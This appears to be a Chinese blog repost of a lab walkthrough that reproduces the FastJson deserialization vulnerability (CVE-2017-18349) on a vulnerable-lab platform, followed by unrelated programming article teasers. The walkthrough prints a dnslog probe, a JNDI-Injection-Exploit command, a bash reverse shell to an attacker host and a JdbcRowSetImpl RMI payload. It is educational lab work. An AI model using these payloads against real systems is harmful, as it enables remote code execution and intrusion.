当前位置：首页 > news >正文

FastJson反序列化漏洞（CVE-2017-18349）

news 2025/9/15 7:54:43

漏洞原理

原理就不多说了，可以去看我这篇文章，已经写得很详细了。

Java安全—log4j日志&FastJson序列化&JNDI注入-CSDN博客

影响版本

FastJson<=1.2.24

复现过程

这里我是用vulfocus.cn这个漏洞平台去复现的，比较方便，访问发现是个Json的数据。

抓个包，改为post请求模式，数据类型改为json，随便请求个json格式的数据再发送，发现其会处理json的数据。

找个dnslog平台测试一下。

{"a":{"@type":"java.net.Inet4Address","val":"dnslog地址"}
}

发现有回显，说明存在远程命令执行漏洞。

接着来反弹shell，我们用JNDI-Injection-Exploit这个工具来进行，这个工具比较方便可以根据命令来生成rmi/ldap资源路径，就不需要我们自己编写class文件了。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxx}|{base64,-d}|{bash,-i}" -A xxx.xxx.xxx（vps的IP）

把上面echo后面的xxxx替换成下面反弹shell命令的base64编码，执行命令之后就会生成几个资源链接，不知道用哪个的话，都试试就行。

bash -i >/dev/tcp/xxx.xxx.xxx.xxx/port 0>&1

利用这个payload，把dataSourceName里面的内容换成我们上面的资源链接。

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx/xxx",	"autoCommit":true}
}

监听一下连接端口

重新发包。

可以看到有服务器请求了我们的rmi资源。

但是没有返回shell，奇了怪了，昨天都还正常的，算了不管了，反正原理就这样。

总结

这个漏洞原理只要你把它搞懂了其实很简单的，不算难，而且无论什么版本的FastJson的漏洞原理都是一样的。只不过是增加了一下黑白名单的过滤，也存在对应的绕过方法，搜一下payload即可。

FastJson反序列化漏洞（CVE-2017-18349）

漏洞原理原理就不多说了，可以去看我这篇文章，已经写得很详细了。 Java安全—log4j日志&FastJson序列化&JNDI注入-CSDN博客影响版本 FastJson<1.2.24 复现过程这里我是用vulfocus.cn这个漏洞平台去复现的，比较方便&#x…...

编程日记 2024/11/21 12:14:43

【优选算法篇】分治乾坤，万物归一：在重组中窥见无声的秩序

文章目录分治专题（二）：归并排序的核心思想与进阶应用前言、第二章：归并排序的应用与延展2.1 归并排序（medium）解法（归并排序）C 代码实现易错点提示时间复杂度和空间复杂度 2.2 数组…...

编程日记 2024/11/21 12:12:40

C++：探索AVL树旋转的奥秘

文章目录前言 AVL树为什么要旋转？一、插入一个值的大概过程1. 插入一个值的大致过程2. 平衡因子更新原则3. 旋转处理的目的二、左单旋1. 左单旋旋转方式总处理图2. 左单旋具体会遇到的情况3. 左单旋代码总结三、右单旋1. 右单旋旋转方式总处理图2. 右单旋具体会遇…...

编程日记 2024/11/21 12:08:36

2. Django中的URL调度器 (自定义路径转换器)

在 Django 中，URL 路由通常使用路径转换器（path converters）来匹配和捕获 URL 中的特定模式，例如整数、字符串或 slug 等。默认情况下，Django 提供了一些内置的路径转换器，如 <int>、<str>、&l…...

编程日记 2024/11/21 12:07:31

深度学习：神经网络中线性层的使用

深度学习：神经网络中线性层的使用在神经网络中，线性层（也称为全连接层或密集层）是基础组件之一，用于执行输入数据的线性变换。通过这种变换，线性层可以重新组合输入数据的特征，并将其映射到新…...

编程日记 2024/11/21 12:05:27

【刷题】算法设计题+程序设计题【2】2019-2024

11.202019年真题*2BST二叉排序树分裂、双向冒泡排序 2019 真题【2019 1】编写算法，将一棵二叉排序树分解成两棵二叉排序树 t1和t2，使得t1中的所有结点关键字的值都小于x，t2中所有结点关键字都大于x。 typedef struct BSTNode{int data;str…...

编程日记 2024/11/21 12:04:26

搭建es环境

centos7搭建elasticsearch环境首先考虑使用 Docker 来安装 Elasticsearch、Kibana 和 Logstash。在安装过程中，可能会遇到一些问题，但通过适当的方法可以解决。 docker pull docker.elastic.co/elasticsearch/elasticsearch:8.14.3 首先创建一个网络&a…...

编程日记 2024/11/21 12:00:21

阿里云和七牛云对象存储区别和实现

七牛云对象存储操作（QiniuUtil） 配置：使用 com.qiniu.storage.Configuration 类来配置上传设置，如指定区域（Region）和分片上传版本。上传管理器：通过 UploadManager 类来处理文件上传。认证&am…...

编程日记 2024/11/21 11:57:17

uniapp微信小程序接入airkiss插件进行WIFI配网

本文可参考uniapp小程序插件一.申请插件微信公众平台设置页链接：微信公众平台登录您的小程序微信公众平台，进入设置页，在第三方设置->插件管理->添加插件中申请AiThinkerAirkissforWXMini插件，申请的插件appId为【wx6…...

编程日记 2024/11/21 11:54:12

HtmlWebpackPlugin | webpack 中文文档 | webpack中文文档 | webpack中文网安装 npm install --save-dev html-webpack-plugin 下载html-webpack-plugin本地软件包 npm i html-webpack-plugin --save-dev 配置webpack.config.js让webpack拥有插件功能 const HtmlWebpack…...

编程日记 2024/11/21 11:52:09

Python毕业设计选题：基于python的豆瓣电影数据分析可视化系统-flask+spider

开发语言：Python框架：flaskPython版本：python3.7.7数据库：mysql 5.7数据库工具：Navicat11开发软件：PyCharm 系统展示系统首页个人中心管理员登录界面管理员功能界面电影管理用户管理系统管理摘要…...

编程日记 2024/11/21 11:49:02

抽象类能使用final修饰吗？

不能。在java中，抽象类不能使用final修饰。原因是final修饰符用于类不能被继承，而抽象类的主要用途就是被继承以提供基础实现或定义抽象方法供子类实现。这两个互相矛盾，因此不能同时使用。具体解释 abstract修饰符:用于定义一个抽象类&…...

编程日记 2024/11/21 11:48:00

C语言内存：我家大门常打开

C语言本着自由开放的理念，并不禁止程序访问非法内存。什么是非法内存？就是那本不是你家的地，你却硬跑过去种庄稼。或者，你在澡堂子里拿着自己的钥匙去捅别人的柜。这种行为当然后果难料。可能你捅了半天，火花冒…...

编程日记 2024/11/21 11:43:54

路由协议——iBGP与EBGP

一、适用场景 1、企业需要连接总部与分部，但总部与分部运行着不同的路由协议，总部到分部有自建的专线，端到端的设备支持BGP路由协议。 2、网络运营商，如电信、联通、移动等，各区域的ip路由表庞大，若要完成…...

编程日记 2024/11/21 11:42:52

【Linux】基础02

Linux编译和调试 VI编辑文件 vi : 进入文件编辑是命令行模式 i ：从光标处进入插入模式 dd : 删除光标所在行 n dd 删除指定行数 Esc ： 退出插入模式 ： 冒号进入末行模式 :wq : 保存退出 :q ： 未修改文件可以退出 :q! …...

编程日记 2024/11/21 11:37:44

Elasticsearch面试内容整理-安全与权限管理

在 Elasticsearch 中，安全与权限管理至关重要，特别是当系统处理敏感数据时。Elasticsearch 提供了一套全面的安全机制来确保数据的机密性、完整性和可用性。以下是 Elasticsearch 安全与权限管理的详细介绍。安全组件概述 Elasticsearch 的安全功能由 Elastic Stack 提供的一…...

编程日记 2024/11/21 11:32:37

【数据分享】中国汽车工业年鉴（1986-2023）

本年鉴是由工业和信息化部指导，中国汽车技术研究中心有限公司与中国汽车工业协会联合主办。《年鉴》是全面、客观记载中国汽车工业发展与改革历程的重要文献，内容涵盖汽车产业政策、标准、企业、市场以及全国各省市汽车工业发展情况，并调查汇…...

编程日记 2024/11/21 11:31:32

el-cascader 使用笔记

1.效果 2.官网 https://element.eleme.cn/#/zh-CN/component/cascader 3.动态加载（官网） <el-cascader :props"props"></el-cascader><script>let id 0;export default {data() {return {props: {lazy: true,lazyLoad (…...

编程日记 2024/11/21 11:25:15

代替Spinnaker 的 POINTGREY工业级相机 FLIR相机 Python编程案例

SpinnakerSDK_FULL_4.0.0.116_x64 是一个用于FLIR相机的SDK，主要用于图像采集和处理。Spinnaker SDK主要提供C接口，无法直接应用在python环境。本文则基于Pycharm2019python3.7的环境下，调用opencv,EasySpin,PySpin,的库实现POINTGREY工业级相…...

编程日记 2024/11/21 11:16:40

网络篇12 | SSH2协议应用，禁SFTP子模式实现文件传输

网络篇12 | SSH2的应用解决的业务问题协议选定SSH2（Secure Shell 2，目前基本用这个）SSH1（Secure Shell 1）Telnet 代码实现落地方案1：ganymed-ssh2maven坐标关键源代码技术效果验证连接高版本OpenSSH报错分…...

编程日记 2024/11/21 11:13:13

无法与IP建立连接，未能下载VSCode服务器

如题，在远程连接服务器的时候突然遇到了这个提示。查阅了一圈，发现是VSCode版本自动更新惹的祸！！！ 在VSCode的帮助->关于这里发现前几天VSCode自动更新了，我的版本号变成了1.100.3 才导致了远程连接出…...

编程新知 2025/9/9 16:59:16

家政维修平台实战20：权限设计

目录 1 获取工人信息2 搭建工人入口3 权限判断总结目前我们已经搭建好了基础的用户体系，主要是分成几个表，用户表我们是记录用户的基础信息，包括手机、昵称、头像。而工人和员工各有各的表。那么就有一个问题，不同的角色&#xf…...

编程新知 2025/9/14 12:35:07

【android bluetooth 框架分析 04】【bt-framework 层详解 1】【BluetoothProperties介绍】

1. BluetoothProperties介绍 libsysprop/srcs/android/sysprop/BluetoothProperties.sysprop BluetoothProperties.sysprop 是 Android AOSP 中的一种系统属性定义文件（System Property Definition File），用于声明和管理 Bluetooth 模块相…...

编程新知 2025/7/9 6:14:15